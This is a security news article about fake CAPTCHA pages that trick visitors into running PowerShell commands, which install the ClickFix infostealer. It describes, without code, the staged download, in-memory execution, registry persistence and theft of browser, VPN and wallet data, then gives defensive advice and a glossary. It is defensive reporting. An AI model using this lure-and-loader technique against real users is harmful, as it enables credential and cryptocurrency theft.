CAPTCHA Con: How Fake Security Checks Unleashed the ClickFix Infostealer Epidemic

It starts with a simple challenge: “Prove you’re not a robot.” But behind that familiar CAPTCHA prompt, a sophisticated cybercriminal campaign is quietly hijacking systems around the globe. In a chilling twist on social engineering, attackers are weaponizing fake CAPTCHAs to trick users into unleashing the ClickFix infostealer - a malware strain designed to silently plunder credentials, crypto wallets, and VPN secrets from unsuspecting victims.

Dissecting the ClickFix Operation

Security analysts at CyberProof MDR have traced the roots of this campaign to a wave of compromised websites. Instead of the typical phishing emails, these sites present visitors with a convincing but bogus CAPTCHA. Victims, believing it’s a routine security step, are tricked into running PowerShell commands - often by copying and pasting code as instructed on the site. This triggers a chain reaction: an initial PowerShell script fetches a file called cptch.bin from attacker-controlled infrastructure, using advanced tools like Donut to execute malicious code directly in memory and avoid detection.

The infection is multi-staged. After the first payload, a second script attempts to download additional shellcode, each stage designed to slip past security controls. Analysts identified operational security blunders - like the use of the variable $finalPayload - that tipped off Microsoft Defender, but not before the malware had infiltrated numerous systems.

Once embedded, ClickFix isn’t just a one-time thief. It modifies the system registry to ensure it runs after every reboot, maintaining a persistent backdoor. From there, it targets a broad spectrum of applications: Chrome, Edge, Brave, Tor, and more, as well as VPNs like NordVPN and Mullvad, and crypto wallets such as MetaMask and Exodus. Sensitive data is siphoned off to remote servers, all while the victim remains oblivious.

Indicators of compromise include suspicious IP addresses and file hashes, but the real danger lies in the campaign’s adaptability. By blending social engineering with technical stealth, attackers are bypassing traditional defenses and exploiting everyday user behavior.

Staying Ahead of the Phish

Experts urge organizations to adopt a layered defense: restrict access to risky system features, harden PowerShell use, enforce strict app controls, and - crucially - educate users about the dangers of following instructions from untrusted web pages. As cybercriminals continue to refine their tactics, only a combination of vigilant monitoring, advanced threat detection, and user awareness can blunt the impact of these evolving attacks.

The fake CAPTCHA con is a sobering reminder: sometimes, the greatest threat is hiding behind the most familiar façade.

WIKICROOK

• Infostealer: An infostealer is malware designed to steal sensitive data - like passwords, credit cards, or documents - from infected computers without the user's knowledge.
• PowerShell: PowerShell is a Windows scripting tool used for automation, but attackers often exploit it to perform malicious actions stealthily.
• Persistence Mechanism: A persistence mechanism is a method used by malware to stay active on a system, surviving reboots and removal attempts by users or security tools.
• Process Injection: Process injection is when malware hides within legitimate software processes, making it harder for security tools to detect and remove the threat.
• Social Engineering: Social engineering is the use of deception by hackers to trick people into revealing confidential information or providing unauthorized system access.